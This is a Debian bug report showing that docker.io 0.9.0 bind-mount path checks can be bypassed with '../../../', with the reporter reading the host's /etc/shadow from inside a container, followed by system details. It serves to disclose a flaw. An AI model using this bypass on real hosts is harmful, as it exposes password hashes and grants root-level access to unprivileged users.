Package: docker.io
Version: 0.9.0+dfsg1-1
Tags: security
Severity: important
joey@darkstar:~docker.io run -v /:/mnt -t -i mydebian bash2014/03/22
22:56:23 Invalid bind mount: source can't be '/'
joey@darkstar:~ docker.io run -v ../../../:/mnt -t -i debian bash
root@b7647a89f0d7:/# wc -l /mnt/etc/shadow
42 /mnt/etc/shadow
IMHO, this is a straight-up security hole. Non-root users should not be
allowed to expose outside system paths into the container. The check for
/ implies I'm right; the absurdly bad impleentation of the check is
... worrying.
Note README.Debian does not indicate that the docker group gives the
user root, either inside or outside the container.
As noted in the upstream documentation (https://docs.docker.io), Docker will
allow non-root users in the docker group to access docker.sock and thus
communicate with the daemon.
-- System Information:
Debian Release: jessie/sid
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386
Kernel: Linux 3.10-3-amd64 (SMP w/4 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Versions of packages docker.io depends on:
ii adduser 3.113+nmu3
ii init-system-helpers 1.18
ii iptables 1.4.21-1
ii libapparmor1 2.8.0-5+b1
ii libc62.18-4
ii libdevmapper1.02.1 2:1.02.83-2
ii libsqlite3-0 3.8.3.1-1
ii perl 5.18.2-2+b1
Versions of packages docker.io recommends:
ii aufs-tools 1:3.2+20130722-1.1
ii ca-certificates 20140223
ii git 1:1.9.1-1
ii xz-utils 5.1.1alpha+20120614-2
docker.io suggests no packages.
-- no debconf information
--
see shy jo
signature.asc
Description: Digital signature